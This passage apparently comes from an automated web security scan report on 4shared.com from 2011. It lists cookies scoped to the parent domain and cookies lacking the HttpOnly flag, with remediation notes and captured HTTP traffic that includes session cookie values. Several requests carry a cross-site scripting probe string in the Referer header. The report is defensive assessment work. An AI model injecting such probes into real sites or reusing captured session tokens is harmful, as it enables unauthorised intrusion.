WWW_JSESSIONID=60B49916F814CD9E6201A558BD8C76F2.dc330; Domain=.4shared.com; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/plupload/plupload.js HTTP/1.1
Host: www.4shared.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/favicon.icof195b%22-alert(document.location)-%226b92c01de75
Cookie: JSESSIONID=60B49916F814CD9E6201A558BD8C76F2.dc330

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:05:25 GMT; Path=/
Set-Cookie: WWW_JSESSIONID=60B49916F814CD9E6201A558BD8C76F2.dc330; Domain=.4shared.com; Path=/
Set-Cookie: hostid=-762786172; Expires=Mon, 26-Jul-2021 14:05:25 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:05:25 GMT
ETag: W/"42158-1302522786000"
Last-Modified: Mon, 11 Apr 2011 11:53:06 GMT
Content-Type: text/javascript
Content-Length: 42158
Date: Fri, 29 Jul 2011 14:05:25 GMT

/**
* plupload.js
*
* Copyright 2009, Moxiecode Systems AB
* Released under GPL License.
*
* License: http://www.plupload.com/license
* Contributing: http://www.plupload.com/contributing
...[SNIP]...

5.9. http://www.4shared.com/js/plupload/plupload.silverlight.js previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.4shared.com
Path:	/js/plupload/plupload.silverlight.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

WWW_JSESSIONID=60B49916F814CD9E6201A558BD8C76F2.dc330; Domain=.4shared.com; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/plupload/plupload.silverlight.js HTTP/1.1
Host: www.4shared.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/favicon.icof195b%22-alert(document.location)-%226b92c01de75
Cookie: JSESSIONID=60B49916F814CD9E6201A558BD8C76F2.dc330

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:05:25 GMT; Path=/
Set-Cookie: WWW_JSESSIONID=60B49916F814CD9E6201A558BD8C76F2.dc330; Domain=.4shared.com; Path=/
Set-Cookie: hostid=-757579128; Expires=Mon, 26-Jul-2021 14:05:25 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:05:25 GMT
ETag: W/"13014-1302522786000"
Last-Modified: Mon, 11 Apr 2011 11:53:06 GMT
Content-Type: text/javascript
Content-Length: 13014
Date: Fri, 29 Jul 2011 14:05:25 GMT

/**
* plupload.silverlight.js
*
* Copyright 2009, Moxiecode Systems AB
* Released under GPL License.
*
* License: http://www.plupload.com/license
* Contributing: http://www.plupload.com/
...[SNIP]...

5.10. http://www.4shared.com/js/signup-script.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.4shared.com
Path:	/js/signup-script.jsp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

WWW_JSESSIONID=D5D751E65CD9BFC9F8E424330A106857.dc328; Domain=.4shared.com; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/signup-script.jsp?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: WWW_JSESSIONID=D5D751E65CD9BFC9F8E424330A106857.dc328; Domain=.4shared.com; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:08:14 GMT
Vary: *
Content-Type: text/javascript
Content-Length: 3516
Date: Fri, 29 Jul 2011 14:08:14 GMT

function checkForm(form) {
var form=document.theForm;
if (form.login.value==null || form.login.value.length==0) {
alert ("You did not enter your e-mail address");
form.
...[SNIP]...

5.11. http://www.4shared.com/sla.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.4shared.com
Path:	/sla.jsp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

WWW_JSESSIONID=D5D751E65CD9BFC9F8E424330A106857.dc328; Domain=.4shared.com; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sla.jsp HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/favicon.icof195b%22-alert(document.location)-%226b92c01de75
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; ppage=P2; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; ppVisited=%2Fsignup.jsp; ppVisitDate=1311948073594; fp=4sess_p72033306_t20110729-150115_; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=60B49916F814CD9E6201A558BD8C76F2.dc330

Response

5.12. http://www.4shared.com/enter.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/enter.jsp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ausk=Sdt45IRrRqsiuJEj; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
ausk=Sdt45IRrRqsiuJEj; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

5.13. http://www.4shared.com/premium.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/premium.jsp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; Domain=.4shared.com; Path=/
ppVisitDate=1311947946262; Domain=.4shared.com; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /premium.jsp?ref=header HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/login.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; ppVisited=%2Fsignup.jsp; ppVisitDate=1311947871563; fp=4sess_p8b7fcdae_t20110729-145753_; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

5.14. http://www.4shared.com/signup.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/signup.jsp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ppVisited=%2Fsignup.jsp; Domain=.4shared.com; Path=/
ppVisitDate=1311947872791; Domain=.4shared.com; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /signup.jsp HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: df=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:52 GMT; Path=/
Set-Cookie: sd=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:52 GMT; Path=/
Set-Cookie: afu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:52 GMT; Path=/
Set-Cookie: afp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:52 GMT; Path=/
Set-Cookie: adu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:52 GMT; Path=/
Set-Cookie: adp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:52 GMT; Path=/
Set-Cookie: asl=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:52 GMT; Path=/
Set-Cookie: chf=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:52 GMT; Path=/
Set-Cookie: dirPwdVerified=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:52 GMT; Path=/
Set-Cookie: ppVisited=%2Fsignup.jsp; Domain=.4shared.com; Path=/
Set-Cookie: ppVisitDate=1311947872791; Domain=.4shared.com; Path=/
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 23864
Date: Fri, 29 Jul 2011 13:57:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv='Content-Type' content='text/html; ch
...[SNIP]...

6. Cookie without HttpOnly flag set previous next
There are 154 instances of this issue:

/favicon.ico
/icons/16x16/default.png
/images/asf-logo.gif
/images/spacer.gif
/images/tomcat.gif
/images/void.gif
/js/Jsonp.js
/js/homeScript.jsp
/js/loginScript.jsp
/js/plupload/plupload.flash.js
/js/plupload/plupload.js
/js/plupload/plupload.silverlight.js
/js/signup-script.jsp
/sla.jsp
/advertise/search/images/300x250.gif
/advertise/search/images/468x60.gif
/advertise/search/images/728x90.gif
/css/common.css
/css/index.css
/css/lang/style-ms.css
/css/lang/style-ru.css
/css/mainWithoutCommon.css
/css/style.css
/desktop/images/scr3_new.gif
/desktop/images/scr4.gif
/desktop/images/scr5.gif
/desktop/images/scr6.gif
/developer/developer.css
/developer/images/devices.png
/developer/images/footer-corner.png
/developer/images/title.png
/enter.jsp
/images/1.gif
/images/2.gif
/images/3.gif
/images/4.gif
/images/bg10.png
/images/blueBanner_plus.gif
/images/bookmarks/newstyle/facebook.png
/images/bookmarks/newstyle/orkut.png
/images/bookmarks/newstyle/orkutshare.png
/images/bookmarks/newstyle/twitter.png
/images/brdlefts.gif
/images/brdrights.gif
/images/butGetStarted.gif
/images/butGo.gif
/images/butJoinNow.gif
/images/butLogin.gif
/images/cornerBL.gif
/images/cornerBL2.gif
/images/cornerBR.gif
/images/cornerBR2.gif
/images/cornerTL.gif
/images/cornerTL3.gif
/images/cornerTL6.gif
/images/cornerTR.gif
/images/crn1.gif
/images/crn2.gif
/images/crn3.gif
/images/div2.gif
/images/divtop.gif
/images/docImg1.jpg
/images/docImg2.jpg
/images/docImg4.jpg
/images/docScr1.jpg
/images/feat1doc.gif
/images/feat1mus.gif
/images/feat2doc.gif
/images/feat3.gif
/images/feat3doc.gif
/images/feat4.gif
/images/featbg1.gif
/images/featbg2mus.gif
/images/featimg1doc.gif
/images/featimg1mus.gif
/images/featimg2doc.gif
/images/featimg3doc.gif
/images/featimg4doc.gif
/images/featimg4mus.gif
/images/fileSharing.jpg
/images/fileSharingScheme.gif
/images/fileSharingView.gif
/images/hborders.gif
/images/icons/16x16/expand.png
/images/icons/16x16/shrink.png
/images/icons/64x64/dollars.png
/images/icons/64x64/support.png
/images/icons/all.png
/images/icons/flags/ae.gif
/images/icons/flags/ar.gif
/images/icons/flags/au.gif
/images/icons/flags/bg.gif
/images/icons/flags/bh.gif
/images/icons/flags/bo.gif
/images/icons/flags/br.gif
/images/icons/flags/ca.gif
/images/icons/flags/fi.gif
/images/icons/flags/fr.gif
/images/icons/flags/gb.gif
/images/icons/flags/iq.gif
/images/icons/flags/ir.gif
/images/icons/flags/it.gif
/images/icons/flags/jp.gif
/images/icons/flags/kw.gif
/images/icons/flags/lk.gif
/images/icons/flags/lt.gif
/images/icons/flags/lu.gif
/images/icons/flags/ly.gif
/images/icons/flags/mx.gif
/images/icons/flags/my.gif
/images/icons/flags/nl.gif
/images/icons/flags/no.gif
/images/icons/misc/ok.gif
/images/images/icossl.gif
/images/index-premium-features.png
/images/logo.gif
/images/logol.gif
/images/menu.gif
/images/menuOver.gif
/images/menuSel.gif
/images/menutabs.gif
/images/mobile/nokia_e51_thumb.png
/images/mobile/nokia_e63_thumb.png
/images/mobile/nokia_e66_thumb.png
/images/mobile/nokia_e71_thumb.png
/images/mobile/nokia_e72_thumb.png
/images/mobile/screens/4mS_1.jpg
/images/mobile/screens/4mS_2.jpg
/images/mobile/screens/4mS_3.jpg
/images/mobile/screens/4mS_4.jpg
/images/mobile/square_4shared.png
/images/mobile/symbian_mobile_new.png
/images/musImg2.jpg
/images/musImg3.jpg
/images/musImg4.jpg
/images/musScr2.gif
/images/play.gif
/images/resellerHead.png
/images/shad1.gif
/images/shad2.gif
/images/shad3.gif
/images/shad4.gif
/images/top.jpg
/images/topbg.gif
/images/vborders.gif
/js/Events.js
/js/homeScript.jsp
/js/jquery-1.4.4.min.js
/js/loginScript.jsp
/js/signup-script.jsp
/js/sysinfo.js
/login.jsp
/premium.jsp
/signup.jsp

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

6.1. http://www.4shared.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.4shared.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

WWW_JSESSIONID=D5D751E65CD9BFC9F8E424330A106857.dc328; Domain=.4shared.com; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.2. http://www.4shared.com/icons/16x16/default.png previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.4shared.com
Path:	/icons/16x16/default.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; Domain=.4shared.com; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.3. http://www.4shared.com/images/asf-logo.gif previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.4shared.com
Path:	/images/asf-logo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=D5D751E65CD9BFC9F8E424330A106857.dc328; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.4. http://www.4shared.com/images/spacer.gif previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.4shared.com
Path:	/images/spacer.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

WWW_JSESSIONID=60B49916F814CD9E6201A558BD8C76F2.dc330; Domain=.4shared.com; Path=/
hostid=-720656152; Expires=Mon, 26-Jul-2021 14:05:25 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

6.5. http://www.4shared.com/images/tomcat.gif previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.4shared.com
Path:	/images/tomcat.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=4AE600031E51DE28C97F64F946EE76F5.dc329; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.6. http://www.4shared.com/images/void.gif previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.4shared.com
Path:	/images/void.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=38495591D688E5F4D8D920445CB59833.dc329; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.7. http://www.4shared.com/js/Jsonp.js previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.4shared.com
Path:	/js/Jsonp.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

WWW_JSESSIONID=D5D751E65CD9BFC9F8E424330A106857.dc328; Domain=.4shared.com; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.8. http://www.4shared.com/js/homeScript.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.4shared.com
Path:	/js/homeScript.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

WWW_JSESSIONID=00339AC45B50830C2A985D9B562FA591.dc329; Domain=.4shared.com; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.9. http://www.4shared.com/js/loginScript.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.4shared.com
Path:	/js/loginScript.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

WWW_JSESSIONID=D5D751E65CD9BFC9F8E424330A106857.dc328; Domain=.4shared.com; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: WWW_JSESSIONID=D5D751E65CD9BFC9F8E424330A106857.dc328; Domain=.4shared.com; Path=/
Vary: *
Content-Type: text/javascript
Content-Length: 1346
Date: Fri, 29 Jul 2011 14:08:22 GMT

function clearLogin(){
var field=document.getElementById('loginfield');
if (field.value=="your e-mail") {
field.value="";
field.className = field.className.replace("fieldhint
...[SNIP]...

6.10. http://www.4shared.com/js/plupload/plupload.flash.js previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.4shared.com
Path:	/js/plupload/plupload.flash.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

WWW_JSESSIONID=60B49916F814CD9E6201A558BD8C76F2.dc330; Domain=.4shared.com; Path=/
hostid=1152470595; Expires=Mon, 26-Jul-2021 14:05:26 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

6.11. http://www.4shared.com/js/plupload/plupload.js previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.4shared.com
Path:	/js/plupload/plupload.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

WWW_JSESSIONID=60B49916F814CD9E6201A558BD8C76F2.dc330; Domain=.4shared.com; Path=/
hostid=-762786172; Expires=Mon, 26-Jul-2021 14:05:25 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:05:25 GMT; Path=/
Set-Cookie: WWW_JSESSIONID=60B49916F814CD9E6201A558BD8C76F2.dc330; Domain=.4shared.com; Path=/
Set-Cookie: hostid=-762786172; Expires=Mon, 26-Jul-2021 14:05:25 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:05:25 GMT
ETag: W/"42158-1302522786000"
Last-Modified: Mon, 11 Apr 2011 11:53:06 GMT
Content-Type: text/javascript
Content-Length: 42158
Date: Fri, 29 Jul 2011 14:05:25 GMT

/**
* plupload.js
*
* Copyright 2009, Moxiecode Systems AB
* Released under GPL License.
*
* License: http://www.plupload.com/license
* Contributing: http://www.plupload.com/contributing
...[SNIP]...

6.12. http://www.4shared.com/js/plupload/plupload.silverlight.js previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.4shared.com
Path:	/js/plupload/plupload.silverlight.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

WWW_JSESSIONID=60B49916F814CD9E6201A558BD8C76F2.dc330; Domain=.4shared.com; Path=/
hostid=-757579128; Expires=Mon, 26-Jul-2021 14:05:25 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:05:25 GMT; Path=/
Set-Cookie: WWW_JSESSIONID=60B49916F814CD9E6201A558BD8C76F2.dc330; Domain=.4shared.com; Path=/
Set-Cookie: hostid=-757579128; Expires=Mon, 26-Jul-2021 14:05:25 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:05:25 GMT
ETag: W/"13014-1302522786000"
Last-Modified: Mon, 11 Apr 2011 11:53:06 GMT
Content-Type: text/javascript
Content-Length: 13014
Date: Fri, 29 Jul 2011 14:05:25 GMT

/**
* plupload.silverlight.js
*
* Copyright 2009, Moxiecode Systems AB
* Released under GPL License.
*
* License: http://www.plupload.com/license
* Contributing: http://www.plupload.com/
...[SNIP]...

6.13. http://www.4shared.com/js/signup-script.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.4shared.com
Path:	/js/signup-script.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

WWW_JSESSIONID=D5D751E65CD9BFC9F8E424330A106857.dc328; Domain=.4shared.com; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: WWW_JSESSIONID=D5D751E65CD9BFC9F8E424330A106857.dc328; Domain=.4shared.com; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:08:14 GMT
Vary: *
Content-Type: text/javascript
Content-Length: 3516
Date: Fri, 29 Jul 2011 14:08:14 GMT

function checkForm(form) {
var form=document.theForm;
if (form.login.value==null || form.login.value.length==0) {
alert ("You did not enter your e-mail address");
form.
...[SNIP]...

6.14. http://www.4shared.com/sla.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.4shared.com
Path:	/sla.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

WWW_JSESSIONID=D5D751E65CD9BFC9F8E424330A106857.dc328; Domain=.4shared.com; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.15. http://www.4shared.com/advertise/search/images/300x250.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/advertise/search/images/300x250.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=1872608999; Expires=Mon, 26-Jul-2021 14:01:29 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /advertise/search/images/300x250.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:01:29 GMT; Path=/
Set-Cookie: hostid=1872608999; Expires=Mon, 26-Jul-2021 14:01:29 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:01:29 GMT
ETag: W/"7736-1295256530000"
Last-Modified: Mon, 17 Jan 2011 09:28:50 GMT
Content-Type: image/gif
Content-Length: 7736
Date: Fri, 29 Jul 2011 14:01:28 GMT

GIF89a,..........................................................................................*;....Zp..........e{..fR|...........c|.......g...2....<T.............<T.....V9Fa.......Xj..............
...[SNIP]...

6.16. http://www.4shared.com/advertise/search/images/468x60.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/advertise/search/images/468x60.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=1790242678; Expires=Mon, 26-Jul-2021 14:01:28 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /advertise/search/images/468x60.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:01:28 GMT; Path=/
Set-Cookie: hostid=1790242678; Expires=Mon, 26-Jul-2021 14:01:28 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:01:28 GMT
ETag: W/"6394-1295256530000"
Last-Modified: Mon, 17 Jan 2011 09:28:50 GMT
Content-Type: image/gif
Content-Length: 6394
Date: Fri, 29 Jul 2011 14:01:28 GMT

GIF89a.._........................................................................................e|..cO...|...........d}..........g...2....<T..........<T.....U8......Fa....Wi.........................x
...[SNIP]...

6.17. http://www.4shared.com/advertise/search/images/728x90.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/advertise/search/images/728x90.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-1415456175; Expires=Mon, 26-Jul-2021 14:01:49 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /advertise/search/images/728x90.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:01:49 GMT; Path=/
Set-Cookie: hostid=-1415456175; Expires=Mon, 26-Jul-2021 14:01:49 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:01:49 GMT
ETag: W/"7502-1295256530000"
Last-Modified: Mon, 17 Jan 2011 09:28:50 GMT
Content-Type: image/gif
Content-Length: 7502
